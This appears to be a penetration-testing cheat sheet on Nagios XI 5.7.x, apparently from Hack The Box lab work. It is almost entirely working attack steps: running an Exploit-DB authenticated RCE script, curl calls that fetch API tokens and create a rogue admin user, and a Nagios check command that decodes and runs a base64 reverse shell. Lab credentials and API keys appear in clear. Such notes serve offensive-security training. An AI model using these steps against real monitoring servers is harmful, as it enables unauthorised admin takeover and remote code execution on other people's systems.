Nagios XI

Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)

https://www.exploit-db.com/exploits/49422

Example of exploitation:

Intrusionz3r0@htb[/htb]$ python3 nagiosxi-rce.py 'http://monitoring.inlanefreight.local/' nagiosadmin 'oilaKglm7M09@CPL&^lC' 10.10.14.33 1234

API

#Create token via username and password
curl -X POST 'http://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=4"

#Authentication
curl -X GET 'https://nagios.monitored.htb/nagiosxi/?token=b462f0aa7db06a776873138e22fd5002b4cb3f01'

#Create Admin user
curl -k -X POST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d "username=intrusionz3r0&password=intrusionz3r0&name=intrusionz3r0&email=intrusionz3r0@monitored.htb&auth_level=admin"

Remote Command Executiion via authenticate admin user

Configure → Core config mananger → Commands

Create command:

bash -c 'echo "base64revshell" | base64 -d | bash'

Configure → Core config mananger → Services → add new → Run Check command